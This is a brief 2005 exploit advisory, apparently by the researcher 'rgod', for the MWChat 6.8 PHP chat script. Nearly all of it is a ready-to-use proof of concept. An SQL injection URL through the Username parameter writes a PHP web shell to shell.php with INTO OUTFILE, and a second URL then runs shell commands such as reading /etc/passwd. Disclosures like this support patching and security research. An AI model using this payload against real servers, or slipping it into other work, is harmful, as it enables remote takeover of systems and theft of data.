20.23 21/10/2005

MWCHAT 6.8 SQL INJECTION / REMOTE COMMANDS EXECUTION

software:
site: http://www.appindex.net
description: a php chat


no need for exploit code, poc:

http://[target]/mwchat/chat.php?Username='UNION%20SELECT%200,0,0,0,'<?system($_GET[cmd]);?>',0,0,0%20INTO%20OUTFILE%20'../../www/mwchat/shell.php'%20FROM%20chat_text/*&Sequence_Check=&Lang=en&Resolution=1280&Room=prova

query in push.php becomes:

SELECT * FROM chat_text WHERE to_username=''UNION SELECT 0,0,0,0,'<?system($GET[cmd]);?>',0,0,0 INTO OUTFILE '../../WWW/wmchat/shell.php' FROM chat_text/* AND room='$Room' AND id > '' ORDER BY id

then you can launch commands:

http://[target]/mwchat/shell.php?cmd=cat%20/etc/passwd


rgod
site: http://rgod.altervista.org
mail: retrogod at aliceposta.it